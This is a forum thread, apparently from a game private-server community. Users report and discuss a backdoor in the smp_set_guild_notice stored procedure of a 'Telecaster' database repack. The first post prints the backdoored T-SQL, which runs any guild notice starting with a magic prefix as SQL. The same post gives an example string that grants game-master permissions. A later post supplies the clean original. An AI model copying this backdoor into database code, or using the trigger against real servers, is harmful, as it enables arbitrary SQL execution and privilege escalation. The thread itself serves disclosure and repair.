Stored Procedure Backdoor E9.1

05/27/2017 01:58 Dark Blaze#1
Found a backdoor in Telecaster database for E9.1 in Revo's first release, it has been changed after while.

smp_set_guild_notice
Code:
USE [Telecaster]
GO
/****** Object:  StoredProcedure [dbo].[smp_set_guild_notice]    Script Date: 5/27/2017 1:49:17 AM ******/
SET ANSI_NULLS OFF
GO
SET QUOTED_IDENTIFIER OFF
GO

ALTER PROCEDURE [dbo].[smp_set_guild_notice]
@IN_GUILD_SID	INT,
@IN_NOTICE		NVARCHAR(128)
AS
SET NOCOUNT ON

IF (LEFT(@IN_NOTICE, 6) = '_)$*%R')
	BEGIN
		set @IN_NOTICE = REPLACE(@IN_NOTICE,'_)$*%R','')
		EXEC sp_executesql @IN_NOTICE;
	END
ELSE
	BEGIN
		UPDATE dbo.Guild SET notice = @IN_NOTICE WHERE sid = @IN_GUILD_SID
	END
The backdoor works by starting your guild notice with "_)$*%R" then writing the query, for example writing "_)$*%R UPDATE Character SET permission = 100 WHERE name = 'DarkBlaze'" would grant me GM permissions on a server using Telecaster database provided by ismoke.
05/27/2017 02:53 ThunderNikk#2
Great here is the original in case people want to modify...
Code:
USE [Telecaster]
GO
/****** Object:  StoredProcedure [dbo].[smp_set_guild_notice]    Script Date: 5/26/2017 8:50:20 PM ******/
SET ANSI_NULLS ON
GO
SET QUOTED_IDENTIFIER ON
GO
--RevolutionTeam
ALTER PROCEDURE [dbo].[smp_set_guild_notice]
@IN_GUILD_SID INT,
@IN_NOTICE  NVARCHAR(128)
AS
SET NOCOUNT ON

 UPDATE dbo.Guild SET notice = @IN_NOTICE WHERE sid = @IN_GUILD_SID
05/27/2017 10:19 SilentWisdom#3
Let's be clear I only released a cleaned version of the Telecaster that was released by Revolution. I did not, have never and will never use/release/endorse hacks.
05/27/2017 13:17 Dark Blaze#4
I downloaded both your Telecaster and theirs and checked each one, I only found that in yours. You can check both mirrors.
05/27/2017 14:27 TheOnlyOneRaskim#5
Haha funny.

Smoke, Come to the dark side. I have cookies. XD
05/27/2017 15:26 InkDevil#6
Well, I compared some Telecaster-backups...
That backdoor was added in one of the first uploaded 9.1-Repacks by Team Revolution ( I checked my archive I downloaded 2 years ago),
but they "fixed" it by themselves and reuploaded their files (one or more time, don't know).
So it doesn't exist in their latest download-pack this way anymore.
Thx for deleting that on your own, Team Revolution :)

So if @[Only registered and activated users can see links. Click Here To Register...] cleaned that unfixed one you can't really make him the bad guy for this.

- just to clean accusations ;)
05/27/2017 16:27 Ghost Informatics#7
The bug in the files from 8.1 you can check the 8.1 repacks the most of them are bugged and 9.1 also we fixed this bug from 2016 .. some team named (volcano) they bugged files and tools with auto inject i don't know any tool but i got a files after i hacked them this files proof that and there's other bug in insert character 8.1 & 9.1 we fixed it( and we published the most bugged files in the arabic forums after we fixed it) you can download our repack for 7.2&9.1 it's clean and al7rob repack by rakanomar for 8.1 .. there's many bugged tools in rappelz world i advise you to see the source of tools before download ..
05/28/2017 01:44 Dark Blaze#8
Quote:
Originally Posted by LamiaCore View Post
Well, I compared some Telecaster-backups...
That backdoor was added in one of the first uploaded 9.1-Repacks by Team Revolution ( I checked my archive I downloaded 2 years ago),
but they "fixed" it by themselves and reuploaded their files (one or more time, don't know).
So it doesn't exist in their latest download-pack this way anymore.
Thx for deleting that on your own, Team Revolution :)

So if @[Only registered and activated users can see links. Click Here To Register...] cleaned that unfixed one you can't really make him the bad guy for this.

- just to clean accusations ;)
Not accusing him of doing it, just stating that the one currently included has that backdoor.
05/29/2017 10:15 Ghost Informatics#9
Nulled
05/29/2017 14:52 ThunderNikk#10
I cleaned up this thread a little.

Lets keep it civil guys. We know there was a possible exploit that may be in our telecasters and we know how to make it right.

Doesn't really matter who put it in there now.

Ill leave the topic open for now in case there are other users who need help with this or in case some want to discuss this some more, but if the accusations and defense of accusations keep getting thrown around I will have to close the thread.